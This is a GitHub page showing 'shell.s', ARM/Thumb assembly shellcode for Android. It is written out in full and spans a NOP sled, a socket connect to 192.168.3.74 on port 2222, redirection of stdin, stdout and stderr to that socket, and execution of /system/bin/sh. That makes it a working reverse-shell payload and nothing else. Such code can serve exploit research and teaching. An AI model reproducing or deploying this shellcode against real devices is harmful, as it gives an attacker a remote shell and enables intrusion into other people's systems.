-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathshell.s
More file actions
66 lines (66 loc) · 917 Bytes
/
shell.s
File metadata and controls
66 lines (66 loc) · 917 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
.globl _start
.align 2
_start:
.code 32
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
adr r0, thumb + 1
bx r0
thumb:
.code 16
mov r0, #2 @ AF_INET
mov r1, #1 @ SOCK_STREAM
mov r2, #6 @ IPPROTO_TCP
mov r7, #250
add r7, #31
swi #0 @ socket
mov r4, r0
adr r1, addr
mov r2, #16
mov r7, #250
add r7, #33
swi #0 @ connect
mov r0, r4
mov r1, #0 @ STDIN
mov r7, #63
swi #0 @ dup2
mov r0, r4
mov r1, #1 @ STDOUT
mov r7, #63
swi #0 @ dup2
mov r0, r4
mov r1, #2 @ STDERR
mov r7, #63
swi #0 @ dup2
adr r0, systembinsh
mov r1, #0
push {r1}
push {r0}
mov r1, sp
mov r2, #0
mov r7, #11
swi #0 @ execve
mov r0, #0
mov r7, #1
swi #0 @ exit
nop
addr:
.short 2 @ AF_INET
.ascii "\x08\xAE" @ port = 2222
.byte 192, 168, 3, 74
systembinsh:
.asciz "/system/bin/sh"